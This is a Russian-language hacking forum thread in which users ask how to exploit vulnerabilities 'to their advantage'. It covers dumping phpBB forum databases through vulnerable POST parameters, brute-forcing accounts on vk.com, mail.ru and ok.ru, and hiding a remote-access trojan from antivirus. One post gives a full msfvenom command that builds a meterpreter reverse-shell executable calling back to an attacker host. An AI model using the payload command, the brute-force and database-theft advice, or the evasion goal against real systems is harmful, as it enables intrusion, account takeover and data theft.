Задай Вопрос - Получи Ответ

aNim

Продавец
289
274
19 Дек 2016
и как можно это использовать себе на руку?)
 
L

lukeone

Гость
Данная тема предназначена для ваших вопросов, исключительно на тему уязвимостей. Создавать темы, посвященные какому - либо вопросу, касающихся уязвимостей - не нужно, всё спрашиваем тут.

и как можно это использовать себе на руку?)
Данный вопрос был в теме с уязвимостями phpBB, там был код с уязвимыми параметрами на phpBB некоторых версиях в POST запросах, и если вы такие встретите, то можете протестировать эти параметры и если они окажутся уязвимыми, то получить базу данных форума. Чаще всего на тестируемых версиях они так и остаются уязвимыми и только с обновлением закрывают уязвимости.
 
Последнее редактирование модератором:

Cikad

Участник
39
10
26 Апр 2017
Данная тема предназначена для ваших вопросов, исключительно на тему уязвимостей. Создавать темы, посвященные какому - либо вопросу, касающихся уязвимостей - не нужно, всё спрашиваем тут.


Данный вопрос был в теме с уязвимостями phpBB, там был код с уязвимыми параметрами на phpBB некоторых версиях в POST запросах, и если вы такие встретите, то можете протестировать эти параметры и если они окажутся уязвимыми, то получить базу данных форума. Чаще всего на тестируемых версиях они так и остаются уязвимыми и только с обновлением закрывают уязвимости.
Можете подсказать скрипт или программу , аналогичную с hydra?
 
L

lukeone

Гость
Как вы думаете , актуальна ли сейчас брутфорс атака на , какие-то крупные сайты ( vk.com ; mail.ru ; ok.ru ) ? Или там давно стоит защита от такого рода атак ?
брутфорс всегда актуален, но меня он не особо интересует, так как подобрать пароль это какой то шанс, по мне гораздо интереснее найти ошибку и эксплуатировать её для повышения прав, удалённого доступа или для получения базы данных)
 

Cikad

Участник
39
10
26 Апр 2017
брутфорс всегда актуален, но меня он не особо интересует, так как подобрать пароль это какой то шанс, по мне гораздо интереснее найти ошибку и эксплуатировать её для повышения прав, удалённого доступа или для получения базы данных)
Идея хорошая даже очень , но для этого нужно многое знать ...
 

Cikad

Участник
39
10
26 Апр 2017
Может , кто подсказать правильную команду для создание обратной оболочки ? Пробовал эту : msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.x.x LPORT=4444 R > CDE.exe , но при запуске самого .exe файла на Windows 10 выдает такую ошибку : невозможно запустить это приложение на вашем пк windows 10 .
 

Cikad

Участник
39
10
26 Апр 2017
Кто знает , как можно спрятать вирус-ратник от антивирусных систем ?